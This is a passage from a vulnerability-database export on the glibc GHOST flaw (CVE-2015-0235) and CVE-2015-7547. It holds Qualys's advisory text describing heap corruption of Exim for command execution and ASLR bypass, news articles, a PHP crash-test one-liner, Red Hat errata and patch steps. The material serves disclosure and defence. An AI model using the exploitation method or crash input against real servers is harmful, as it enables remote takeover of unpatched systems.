chunk of memory\r\nwith a slightly larger size (we overwrite only 3 bytes of the size\r\nfield; in any case, we cannot overflow more than 4 bytes on 32-bit\r\nmachines, or 8 bytes on 64-bit machines):\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|---+--------------------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ...\r\n-----|----------------------|---+--------------------|-----\r\n | X|\r\n |------------------------->|\r\n overflow\r\n\r\nwhere:\r\n\r\nstruct malloc_chunk {\r\n\r\n INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */\r\n INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */\r\n\r\n struct malloc_chunk* fd; /* double links -- used only if free. */\r\n struct malloc_chunk* bk;\r\n\r\n /* Only used for large blocks: pointer to next larger size. */\r\n struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */\r\n struct malloc_chunk* bk_nextsize;\r\n};\r\n\r\nand: X marks the spot where the crucial memory corruption takes place.\r\n\r\n\r\nAs a result, this artificially-enlarged free chunk, which is managed by\r\nglibc's malloc, overlaps another block of memory, Exim's current_block,\r\nwhich is managed by Exim's internal memory allocator:\r\n\r\n\r\n |< malloc_chunk |< storeblock\r\n | |\r\n-----|----------------------|------------------------|---------------+---|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ...\r\n-----|----------------------|------------------------|---------------+---|-----\r\n | |\r\n |<-------------------------------------->|\r\n artificially enlarged free chunk\r\n\r\nwhere:\r\n\r\ntypedef struct storeblock {\r\n struct storeblock *next;\r\n size_t length;\r\n} storeblock;\r\n\r\n\r\nThen, we partially allocate the enlarged free chunk and overwrite the\r\nbeginning of Exim's current_block of memory (the "storeblock" structure)\r\nwith arbitrary data. In particular, we overwrite its "next" field:\r\n\r\n\r\n |< malloc_chunk |< storeblock\r\n | |\r\n-----|----------------------|------------------------|--------+----------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ...\r\n-----|----------------------|------------------------|--------+----------|-----\r\n | X |\r\n |<------------------------------->|\r\n allocated chunk\r\n\r\n\r\nThis effectively turns gethostbyname's buffer overflow into a\r\nwrite-anything-anywhere primitive, because we control both the pointer\r\nto the next block of memory returned by Exim's allocator (the hijacked\r\n"next" pointer) and the data allocated (a null-terminated string, the\r\nargument of an SMTP command we send to Exim).\r\n\r\nFinally, we use this write-anything-anywhere primitive to overwrite\r\nExim's run-time configuration, which is cached in the heap memory. More\r\nprecisely, we overwrite Exim's Access Control Lists (ACLs), and achieve\r\narbitrary command execution thanks to Exim's "${run{<command> <args>}}"\r\nstring expansion mechanism:\r\n\r\n |< storeblock\r\n |\r\n-----|-------------------------------|---------------|-------------------|-----\r\n ... | Exim's run-time configuration | ... .. .. ... |n|l| current_block | ...\r\n-----|----x--------------------------|---------------|x------------------|-----\r\n | |\r\n '<------------------------------------------'\r\n hijacked next pointer\r\n\r\n\r\n |< ACLs >|\r\n-----|----+-----+--------+------+----|---------------|-------------------|-----\r\n ... | Exim's run-time configuration | ... .. .. ... | old current_block | ...\r\n-----|----+-----+--------+------+----|---------------|-------------------|-----\r\n | XXXXXXXX |\r\n |<------------------->|\r\n new current_block\r\n\r\n\r\n----[ 5.2 - Information leak ]------------------------------------------------\r\n\r\nThe success of this exploit depends on an important piece of\r\ninformation: the address of Exim's run-time configuration in the heap.\r\nIn this section, we describe how we obtain this address, bypassing the\r\nASLR (Address Space Layout Randomization) and PIE (Position Independent\r\nExecutable) protections.\r\n\r\nFirst, we overflow gethostbyname's heap-based buffer and partially\r\noverwrite the size field of the next contiguous free chunk of memory\r\nwith a slightly larger size:\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|---+-------------------------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ...\r\n-----|----------------------|---+-------------------------|-----\r\n | X|\r\n |------------------------->|\r\n overflow\r\n\r\n\r\nAs a result, this artificially-enlarged free chunk overlaps another\r\nblock of memory, where Exim saves the error message "503 sender not yet\r\ngiven\r\n" for later use:\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|-----------------------------|----------+----|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ...\r\n-----|----------------------|-----------------------------|----------+----|-----\r\n | |\r\n |<-------------------------------------->|\r\n artificially enlarged free chunk\r\n\r\n\r\nThen, we partially allocate the artificially-enlarged free chunk,\r\nthereby splitting it in two: the newly allocated chunk, and a smaller,\r\nfree chunk (the remainder from the split). The malloc_chunk header for\r\nthis remaining free chunk overwrites the very beginning of the saved\r\nerror message with a pointer to the heap (the fd_nextsize pointer):\r\n\r\n\r\n |< malloc_chunk |< malloc_chunk\r\n | |\r\n-----|----------------------|---------------------+-------|----------+----|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ...\r\n-----|----------------------|---------------------+-------|----------+----|-----\r\n | | X |\r\n |<------------------->|<---------------->|\r\n allocated chunk free chunk\r\n\r\n\r\nFinally, we send an invalid SMTP command to Exim, and retrieve the\r\nfd_nextsize heap pointer from Exim's SMTP response, which includes the\r\ncorrupted error message. This effectively turns gethostbyname's buffer\r\noverflow into an information leak; moreover, it allows us to distinguish\r\nbetween 32-bit and 64-bit machines.\r\n\r\n\r\n--[ 6 - Acknowledgments ]-----------------------------------------------------\r\n\r\nWe would like to thank Alexander Peslyak of the Openwall Project for his\r\nhelp with the disclosure process of this vulnerability.\r\n\r\n", "modified": "2015-02-02T00:00:00", "published": "2015-02-02T00:00:00", "id": "SECURITYVULNS:DOC:31672", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31672", "title": "Qualys Security Advisory CVE-2015-0235 - GHOST: glibc gethostbyname buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "Buffer overflow in __nss_hostname_digits_dots().", "modified": "2015-02-02T00:00:00", "published": "2015-02-02T00:00:00", "id": "SECURITYVULNS:VULN:14240", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14240", "title": "GNU glibc gethostbyname functions buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:34", "bulletinFamily": "info", "description": "[](<https://4.bp.blogspot.com/-n9qRyLyEnTk/VMhH-B1pR3I/AAAAAAAAhoo/hhqRYQ4ynzs/s728/ghost-linux-security-vulnerability.png>)\n\nA highly critical vulnerability has been unearthed in the **GNU C Library (glibc)**, a widely used component of most Linux distributions, that could allow attackers to execute malicious code on servers and remotely gain control of Linux machines.\n\n \n\n\nThe vulnerability, dubbed \"**GHOST**\" and assigned _[CVE-2015-0235](<http://seclists.org/oss-sec/2015/q1/283>)_, was discovered and disclosed by the security researchers from Redwood Shores, California-based security firm Qualys on Tuesday.\n\n \n\n\n**CRITICAL AS HEARTBLEED AND SHELLSHOCK**\n\nGHOST is considered to be critical because hackers could exploit it to silently gain complete control of a targeted Linux system without having any prior knowledge of system credentials (i.e. administrative passwords). \n \n**Also Read: **[Top Best Password Managers](<https://thehackernews.com/2016/07/best-password-manager.html>).\n\n \n\n\nThe flaw represents an immense Internet threat, in some ways similar to the **[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>),** **[Shellshock](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>) **and** [Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>) **bugs that came to light last year.\n\n \n\n\n**WHY GHOST ?**\n\nThe vulnerability in the GNU C Library (glibc) is dubbed GHOST because it can be triggered by the library's _gethostbyname family of functions_. Glibc is a repository of open-source software written in the C and C++ coding languages that defines system calls.\n\n \n\n\nThe problem actual originates from a heap-based buffer overflow found in the **___nss_hostname_digits_dots()_** function in glibc. This function is especially invoked by the **_gethostbyname **and** gethostbyname2() **function calls.\n\n \n\n\nAccording to the researchers, a remote attacker has ability to call either of these functions which could allow them to exploit the vulnerability in an effort to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n**EXPLOIT CODE**\n\nIn an attempt to highlight the severity of the risk, security researchers were able to write proof-of-concept exploit code that is capable to carry out a full-fledged remote code execution attack against the [Exim mail server](<http://exim.org/>). \n \n**Also Read:** [Deep Web Search Engines](<https://thehackernews.com/2016/02/deep-web-search-engine.html>).\n\n \n\n\nThe researcher\u2019s exploit able to bypass all existing exploit protections (like ASLR, PIE and NX) available on both 32-bit and 64-bit systems, including position independent executions, address space layout randomization and no execute protections.\n\n \n\n\nUsing the exploit, an attacker is able to craft malicious emails that could automatically compromise a vulnerable server without the email even being opened, according to Amol Sarwate, director of engineering with Qualys.\n\n \n\n\nSo far, the company has not published the exploit code to the public but eventually it plans to make the exploit available as a Metasploit module.\n\n \n\n\n**VERSIONS AFFECTED**\n\nThe vulnerability affects versions of glibc as far back as glibc-2.2, which was released in 2000.\n\n> \"Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\" researchers from Qualys said in an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) published Tuesday.\n\n**FIXES AVAILABLE FOR SOME LINUX DISTRIBUTIONS**\n\nHowever, major distributors of the Linux operating system, including **[Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>)**, **[Debian](<https://security-tracker.debian.org/tracker/CVE-2015-0235>)** and **[Ubuntu](<https://launchpad.net/ubuntu/+source/eglibc>)**, updated their software on Tuesday to thwart the serious cyber threat. In order to update systems, core functions or the entire affected server reboot is required.\n\n \n\n\nRed Hat, the No. 1 provider of Linux software to businesses, recommends its customers to update their systems _\"as soon as possible to mitigate any potential risk.\"_\n", "modified": "2016-08-04T08:10:47", "published": "2015-01-27T21:17:00", "id": "THN:A649F4ABCE9B99052139693A13D95B14", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html", "type": "thn", "title": "Critical GHOST vulnerability affects most Linux Systems", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-4Dia-n2xwzc/VMtiJcqIwVI/AAAAAAAAhqc/bAafPBMQ_gw/s1600/ghost-glibc-vulnerabilitywordPress.jpg>)\n\nAfter the disclosure of extremely critical **[GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) in the GNU C library (glibc)** \u2014 a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the _**[WordPress](<https://thehackernews.com/search/label/WordPress>) **_Content Management System (CMS), could also be affected by the bug.\n\n \n\n\n\"**GHOST**\" is a serious vulnerability (_CVE-2015-0235_), announced this week by the researchers of California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function name - \"GetHOSTbyname().\" Researchers said the vulnerability has been present in the glibc code since 2000.\n\n \n\n\nThough the major Linux distributors such as **Red Hat**, **Debian** and** Ubuntu**, have already updated their software against the flaw, GHOST could be used by hackers against only a handful of applications currently to remotely run executable code and silently gain control of a Linux server. \n\n \n\n\nAs we explained in our previous article, heap-based buffer overflow was found in ___nss_hostname_digits_dots()_ function, which is particularly used by the **gethostbyname()** and **gethostbyname2()** glibc function call. \n\n \n\n\nSince, PHP applications including WordPress also use the **_gethostbyname() function wrapper_**, the chance of the critical vulnerability becomes higher even after many Linux distributions issued fixes.\n\n \n\n\n**GHOST - BIG ISSUE FOR WORDPRESS**\n\nAccording to the Sucuri researcher Marc-Alexandre Montpas, GHOST vulnerability could be a big issue for WordPress CMS, as it uses **wp_http_validate_url()** function to validate every pingback post URL.\n\n> \"._...And it does so by using gethostbyname(),_\" wrote Montpas in an [advisory](<http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html>) published Wednesday. \"_So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server._\"\n\nThe vulnerability affects all versions of glibc from glibc-2.17 and lower. However, it was patched in glibc-2.18 in May 2013, but was not marked as a security vulnerability so the fix did not make it into many common Linux distributions like RedHat and Ubuntu.\n\n \n\n\n**HOW TO CHECK YOUR SYSTEM AGAINST GHOST FLAW**\n\n> _\"This is a very critical vulnerability and should be treated as such,\"_ Montpas said._ \"If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away.\"_\n\nSucuri also provided the following test PHP code, which an admin can run on their server terminal. If the code returns a segmentation fault, then your Linux server is vulnerable to the GHOST vulnerability.\n\n> _php -r '$e=\"0\u2033;for($i=0;$i<2500;$i++){$e=\"0$e\";} gethostbyname($e);' Segmentation fault_\n\n**HOW TO PROTECT**\n\nUntil now, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. So users of above Linux distributions are recommended to patch their systems, followed by a system reboot, as soon as possible. \n\n * **Disable XML-RPC **\nIf you don\u2019t want to use XML-RPC process, it is possible to disable it altogether. There are even [Wordpress plugins](<https://wordpress.org/plugins/prevent-xmlrpc/>) that will totally disable XML-RPC process. \n\n\n * **Disable Pingback Requests **\nYou may also disable the pingback feature by adding the following code to your **functions.php file**: \n\n\n> _add_filter( 'xmlrpc_methods' , function( $methods' ) { unset( $methods[ 'pingback.ping ] ); return $methods; } );_\n", "modified": "2015-01-30T10:53:39", "published": "2015-01-29T23:53:00", "id": "THN:3DD8F9ADFFEB290F33825414D41B0F41", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability_29.html", "type": "thn", "title": "GHOST glibc Vulnerability Affects WordPress and PHP applications", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.\n\n \n\n\nThe vulnerability is similar to the last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to_ remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nGNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n \n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.\n\n \n\n\nThis code then compromises the vulnerable application or device and tries to take over the control over the whole system.\n\n \n\n\nIt is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.\n\n \n\n\nHowever, an attacker need to bypass several operating system security mechanisms \u2013 _like ASLR and non-executable stack protection _\u2013 in order to achieve successful RCE attack.\n\n \n\n\nAlternatively, an attacker on your network could perform **man-in-the-middle **(MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to a nearly all the major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as the Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to lookup the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who are Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uclibc** library as it is more lightweight than hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n \n\n\n### Where glibc went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle bod Fermin J. Serna released a [Proof-of-Concept](<https://github.com/fjserna/CVE-2015-7547>) (POC) exploit code on Tuesday.\n\n \n\n\nWith this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time as users of affected apps have to wait for updates to become available from developers.\n\n \n\n\nMeanwhile, you can help prevent exploitation of the flaw, if you aren\u2019t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "modified": "2016-02-17T08:27:51", "published": "2016-02-16T21:27:00", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:33", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:14:39", "published": "2015-01-28T05:00:00", "id": "RHSA-2015:0099", "href": "https://access.redhat.com/errata/RHSA-2015:0099", "type": "redhat", "title": "(RHSA-2015:0099) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:03", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:10:28", "published": "2015-01-28T05:00:00", "id": "RHSA-2015:0101", "href": "https://access.redhat.com/errata/RHSA-2015:0101", "type": "redhat", "title": "(RHSA-2015:0101) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:43", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:15:54", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0090", "href": "https://access.redhat.com/errata/RHSA-2015:0090", "type": "redhat", "title": "(RHSA-2015:0090) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:46", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:08", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0092", "href": "https://access.redhat.com/errata/RHSA-2015:0092", "type": "redhat", "title": "(RHSA-2015:0092) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:32", "bulletinFamily": "exploit", "description": "<p>\u8fd1\u65e5\u56fd\u5916\u5b89\u5168\u7814\u7a76\u4eba\u5458\u62ab\u9732\u4e00\u4e2a\u5728 Linux Glibc \u5e93\u4e0a\u53d1\u73b0\u7684\u4e25\u91cd\u7684\u5b89\u5168\u95ee\u9898\uff0c\u5b83\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u5728\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u83b7\u53d6\u64cd\u4f5c\u7cfb\u7edf\u7684\u63a7\u5236\u6743\u9650\uff0c\u7f16\u53f7\u4e3a#CVE-2015-0235#\uff0c\u547d\u540d\u4e3a\u5e7d\u7075\uff08GHOST\uff09\u6f0f\u6d1e\u3002</p><p>\u4ec0\u4e48\u662fGHOST?\u4e3a\u4ec0\u4e48\u547d\u540d\u4e3aGHOST\uff1f</p><p>\u6f0f\u6d1e\u6700\u65e9\u8d77\u6e90\u4e8e:</p><p>The first vulnerable version of the GNU C Library is glibc-2.2, released on November 10, 2000.</p><p>\u201cDuring a code audit performed internally at Qualys, we discovered a buffer overflow in</p><p>the __nss_hostname_digits_dots() function of the GNU C Library (glibc).</p><p>This bug is reachable both locally and remotely via the gethostbyname*() functions, so we decided to analyze it<br>and its impact thoroughly, and named this vulnerability \"GHOST\".\u201d</p><p>\u5f15\u7528\u90e8\u5206\u5927\u81f4\u610f\u601d\uff1a\u201c\u6f0f\u6d1e\u51fa\u73b0\u5728GNU C \u51fd\u6570\u5e93\uff08glibc\uff09\uff0c\u53d7\u5f71\u54cd\u7684\u51fd\u6570gethostbyname*()\uff0c\u547d\u540d\u4e3a\uff1aGHOST\u201d</p><p><strong>\u4ec0\u4e48\u662fglibc</strong></p><p>glibc \u662f GNU \u53d1\u5e03\u7684 libc \u5e93\uff0c\u5373 c \u8fd0\u884c\u5e93\u3002glib c\u662f Linux \u7cfb\u7edf\u4e2d\u6700\u5e95\u5c42\u7684 API\uff0c\u51e0\u4e4e\u5176\u5b83\u4efb\u4f55\u8fd0\u884c\u5e93\u90fd\u4f1a\u4f9d\u8d56\u4e8e glibc\u3002glibc \u9664\u4e86\u5c01\u88c5 Linux \u64cd\u4f5c\u7cfb\u7edf\u6240\u63d0\u4f9b\u7684\u7cfb\u7edf\u670d\u52a1\u5916\uff0c\u5b83\u672c\u8eab\u4e5f\u63d0\u4f9b\u4e86\u8bb8\u591a\u5176\u5b83\u4e00\u4e9b\u5fc5\u8981\u529f\u80fd\u670d\u52a1\u7684\u5b9e\u73b0\u3002glibc \u56ca\u62ec\u4e86\u51e0\u4e4e\u6240\u6709\u7684 UNIX \u901a\u884c\u7684\u6807\u51c6\u3002</p><p><strong>\u6f0f\u6d1e\u5371\u5bb3\uff1a</strong></p><p>\u672c\u5730\u4e0e\u8fdc\u7a0b\u90fd\u53d7\u5f71\u54cd\uff0c\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u5728\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u83b7\u53d6\u64cd\u4f5c\u7cfb\u7edf\u7684\u63a7\u5236\u6743\u9650\u3002</p><p><strong>\u53d7\u5f71\u54cd\u7248\u672c\uff1a</strong></p><p>glibc-2.2 \u4e0e glibc-2.17 \u4e4b\u95f4\u7684\u7248\u672c</p><p>glibc \u76842.18\uff08\u53d1\u5e03\u65e5\u671f\uff1a2013\u5e748\u670812\u65e5\uff09\u5df2\u7ecf\u5df2\u8fdb\u884c\u4e86\u6f0f\u6d1e\u4fee\u590d\uff08\u8865\u4e01\u53d1\u5e03\u65f6\u95f4\uff1a2013\u5e745\u670821\u65e5\uff09</p><p><strong>\u53d7\u5f71\u54cd\u5e73\u53f0\uff1a</strong></p><p><strong> <img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.28%E9%85%8D%E5%9B%BE1.jpg\" alt=\"1.28\u914d\u56fe1\" width=\"580\" height=\"612\"></strong></p><p><strong>\u5bf9\u6b64\uff0c\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u5728\u7b2c\u4e00\u65f6\u95f4\u7814\u7a76\u5e76\u53d1\u5e03\u4e86\u90e8\u5206\u4fee\u590d\u65b9\u6848\uff1a</strong></p><p><strong>Ubuntu12.04\u4fee\u590d\u65b9\u6848\uff1a</strong></p><p>\u5728/etc/apt/sources.list\u6dfb\u52a0\u5b98\u65b9\u5b89\u5168\u66f4\u65b0\u6e90\uff1a</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security main restricted</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security universe</p><p>deb <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>deb-src <a href=\"http://security.ubuntu.com/ubuntu\" rel=\"nofollow\">http://security.ubuntu.com/ubuntu</a> precise-security multiverse</p><p>\u7136\u540e\u6267\u884c\uff1a</p><p>$ sudo apt-get update</p><p>$ sudo apt-get upgrade</p><p><strong>CentOS 